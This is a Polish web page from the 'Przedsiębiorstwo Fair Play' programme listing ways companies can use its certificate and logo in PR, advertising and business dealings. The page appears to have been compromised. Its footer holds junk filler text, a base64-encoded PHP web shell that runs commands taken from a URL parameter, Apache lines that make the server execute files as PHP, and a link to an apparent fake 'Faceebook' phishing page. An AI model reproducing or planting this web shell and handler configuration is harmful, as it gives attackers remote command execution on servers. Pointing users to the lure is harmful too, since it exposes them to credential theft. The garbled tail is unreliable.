|
Wykorzystanie certyfikatu i znaku PFP
1. Wykorzystanie certyfikatu i znaku "Przedsiębiorstwo Fair Play" w działaniach PR:
1.1. Poinformowanie głównych mediów, tj. prasy, radio, TV (branżowych, lokalnych, regionalnych, ogólnopolskich) o udziale w programie
- po przystÄ…pieniu,
- po zakwalifikowaniu siÄ™ do II etapu,
- po zakończeniu edycji.
Możliwe formy:
- konferencja prasowa w siedzibie firmy lub innym miejscu dogodnym dla dziennikarzy (hotel, restauracja, dom kultury itp.);
- przesłanie informacji prasowej do konkretnych redakcji (faksem, e-mailem);
- kontakt bezpośredni (spotkania indywidualne z dziennikarzami, rozmowy telefoniczne).
1.2. Poinformowanie o udziale w programie głównych i potencjalnych klientów, dostawców oraz innych istotnych z punktu widzenia firmy instytucji i organizacji (organizacje przedsiębiorców, kluby biznesu, organizacje pracodawców, agencje rządowe wspierające przedsiębiorców, itp.):
- po przystÄ…pieniu,
- po zakwalifikowaniu siÄ™ do II etapu,
- po zakończeniu edycji.
Możliwe formy:
- przesłanie listu z informacją,
- kontakt bezpośredni (spotkania indywidualne, rozmowy telefoniczne).
1.3. Poinformowanie władz regionalnych i gminnych o udziale firmy w programie:
- po przystÄ…pieniu,
- po zakwalifikowaniu siÄ™ do II etapu,
- po zakończeniu edycji,
Możliwe formy:
- przesłanie listu z informacją,
- kontakt bezpośredni (spotkania indywidualne, rozmowy telefoniczne).
1.4. Poinformowanie wszystkich pracowników o udziale w programie oraz przejściu kolejnych etapów.
1.5. Przekazywanie informacji o uzyskaniu tytułu i certyfikatu "PFP" przez przedstawicieli firmy we wszelkich wystąpieniach publicznych.
1.6. Wyeksponowanie w siedzibie firmy certyfikatu "PFP" tak, aby klienci, dostawcy, pracownicy oraz inne osoby pojawiające się w firmie, mogły go zobaczyć.
2. Wykorzystanie znaku PFP w reklamie i promocji:
2.1. Działania promocyjne. Umieszczanie logo "PFP":
- na materiałach firmowych, np.: papierze listowym, kopertach, wizytówkach firmy;
- w materiałach reklamowych, np.: folderach, katalogach, biuletynach, kalendarzach, akcesoriach promocyjno-reklamowych (długopisy, parasole, koszulki i inne);
- w prezentacjach o firmie (filmy DVD, CD);
- w Internecie (logo, certyfikat oraz inne uzyskane nagrody, listy gratulacyjne, zdjęcia z gal finałowych);
- na opakowaniach, etykietach;
- na produktach;
- na firmowych środkach transportu.
2.2. Działania reklamowe. Umieszczanie logo "PFP":
- w reklamach prasowych,
- w artykułach sponsorowanych,
- w reklamie TV,
- na bilbordach, banerach reklamowych, siatkach maskujÄ…cych prace budowlane,
- na ruchomych reklamach.
3. Wykorzystanie znaku "PFP" w kontaktach handlowych:
- informowanie o uzyskanym tytule i certyfikacie "PFP" podczas bezpośrednich negocjacji i rozmów handlowych;
- umieszczanie logo "PFP" w ofertach handlowych i zapytaniach ofertowych;
- załączanie kopii certyfikatu "PFP" w dokumentacji przetargowej;
- eksponowanie certyfikatu i logo "PFP" na stoiskach wystawienniczych w trakcie targów, szkoleń, warsztatów, konferencji tematycznych, imprez firmowych (np. spotkania świąteczne, karnawałowe, jubileuszowe, z okazji szczególnych osiągnięć firmy itp.).
Księga Tożsamości Znaku "Przedsiębiorstwo Fair Play" |
sssssssssssssss |
aaaaaaaaaaaaa |
TT |
PD9waHAgZWNobyAiPHByZXY+Ijsgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pg== |
Aktualności |
24 sierpnia 2023
eeeee
Odwiedz wiêcej...
19 listopada 2022
https://stalowemiasto.pl/sonda/sonda2/Faceebook/index.html
1 pa¼dziernika 2022
fcfc
ww
15 grudnia 2014
Autopromocja
Zapraszamy do odwiedzenia nowej wersji oficjalnej strony internetowej programu "PrzedsiÄ™biorstwo Fair Play"! wiêcej...
|
adam |
AddType application/x-httpd-php PHP
addType application/x-httpd-php PHP |
|